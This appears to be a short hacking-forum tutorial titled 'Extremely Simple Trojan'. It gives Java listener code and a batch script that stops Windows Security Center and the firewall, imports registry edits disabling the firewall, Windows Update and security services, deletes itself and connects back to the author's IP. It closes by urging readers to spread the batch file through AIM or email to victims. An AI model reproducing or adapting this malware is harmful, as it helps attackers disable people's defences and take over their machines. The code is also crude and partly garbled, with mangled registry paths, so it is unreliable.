Extremely Simple Trojan
Extremely Simple Trojan
ghost | 7440 Reads | This is written for java, but it will work in VB, C++, whatever your prefered language is, I just happen to know the net commands for java best.
Here is the source from my java app: import java.net.*; public class trojServer { public static void main(String args[]) { try{ ServerSocket server = new ServerSocket(5151); System.out.println("Waiting…"); Socket sock = server.accept(); System.out.println(sock); }catch(Exception x){x.printStackTrace();} } }
Now I'll explain a bit.
Bascially all I've done is set a port 5151 to wait for anything to connect to it, then it will resolve the IP address for you.
the batch file should look like
net stop "Security Center" net stop SharedAccess > "%Temp%.kill.reg" ECHO REGEDIT4 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.kill.reg" del "%Temp%.kill.reg" del %0 telnet 127.0.0.1 5151
Now, the 127.0.0.1 will obviously be replaced with your IP address (try running IPCONFIG) and the port, here 5151, with whatever you specifiy. The rest of the code knocks out the firewall and hides from the AV…not really too discreate, but effective.
Start running your serverTroj app and then send the batches out over aim or emails or however you prefer to distrbute them and wait. telnet in once you have the IP address and their secuity is down,
Enjoy… Thanks to Zone Vortex for the firewall/AV killer.
